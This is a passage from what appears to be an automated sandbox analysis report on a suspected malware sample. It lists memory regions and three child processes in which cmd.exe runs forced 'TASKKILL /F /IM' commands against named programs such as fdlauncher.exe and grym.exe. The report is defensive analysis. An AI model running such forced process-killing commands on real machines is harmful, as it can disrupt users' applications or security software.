| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM fdlauncher.exe /IM fdlauncher.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:12 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x87c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
880
0x
860
0x
10C
0x
11C
0x
344
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x00080000 | 0x00083fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00280000 | 0x0033ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000350000 | 0x00350000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004e0000 | 0x004e0000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000550000 | 0x00550000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x00960fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000990000 | 0x00990000 | 0x009cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a20000 | 0x00a20000 | 0x00a5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000af0000 | 0x00af0000 | 0x00b2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000bb0000 | 0x00bb0000 | 0x00beffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c00000 | 0x00c00000 | 0x00c3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c40000 | 0x00c40000 | 0x00c7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c90000 | 0x00c90000 | 0x00ccffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00d0ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00e10000 | 0x00e25fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000e30000 | 0x00e30000 | 0x0222ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02230000 | 0x024fefff | Memory Mapped File | Readable |
|
|
|
|
| ntdsapi.dll | 0x6a730000 | 0x6a747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a750000 | 0x6a7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a830000 | 0x6a88bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a890000 | 0x6a899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a8a0000 | 0x6a98afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a990000 | 0x6a99efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x6a9a0000 | 0x6a9a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9b0000 | 0x6a9c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a9d0000 | 0x6aa04fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x73e30000 | 0x73e3cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM GLDS.exe /IM GLDS.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:23, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:12 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x8b4 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
8B0
0x
8AC
0x
8A8
0x
96C
0x
970
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x000f0000 | 0x000f3fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x00250000 | 0x0030ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000380000 | 0x00380000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x0052ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000530000 | 0x00530000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000007d0000 | 0x007d0000 | 0x0080ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000810000 | 0x00810000 | 0x0084ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000850000 | 0x00850000 | 0x0088ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000008e0000 | 0x008e0000 | 0x0091ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00920000 | 0x00935fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000940000 | 0x00940000 | 0x00ac0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x01ecffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01fcffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01fd0000 | 0x0229efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002330000 | 0x02330000 | 0x0236ffff | Private Memory | Readable, Writable |
|
|
|
|
| fastprox.dll | 0x6a710000 | 0x6a7a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dbghelp.dll | 0x6a7b0000 | 0x6a89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdsapi.dll | 0x6a8c0000 | 0x6a8d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a8e0000 | 0x6a8eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a8f0000 | 0x6a918fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemcomn.dll | 0x6a920000 | 0x6a97bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemprox.dll | 0x6a980000 | 0x6a989fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| framedynos.dll | 0x6a990000 | 0x6a9c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wkscli.dll | 0x6a9d0000 | 0x6a9defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netapi32.dll | 0x6a9e0000 | 0x6a9f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x6aa00000 | 0x6aa0cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mpr.dll | 0x73ba0000 | 0x73bb1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netutils.dll | 0x73e30000 | 0x73e38fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x74080000 | 0x74087fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74460000 | 0x7449afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x749d0000 | 0x749ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x749e0000 | 0x749f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x74b50000 | 0x74b58fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| srvcli.dll | 0x75330000 | 0x75348fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x76490000 | 0x76512fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76780000 | 0x767d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76910000 | 0x7699efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x76c80000 | 0x76c85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x76d30000 | 0x76e8bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x77130000 | 0x77164fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM grym.exe /IM grym.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:11 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0x83c |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
840
0x
13C
0x
130
0x
674
0x
688
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
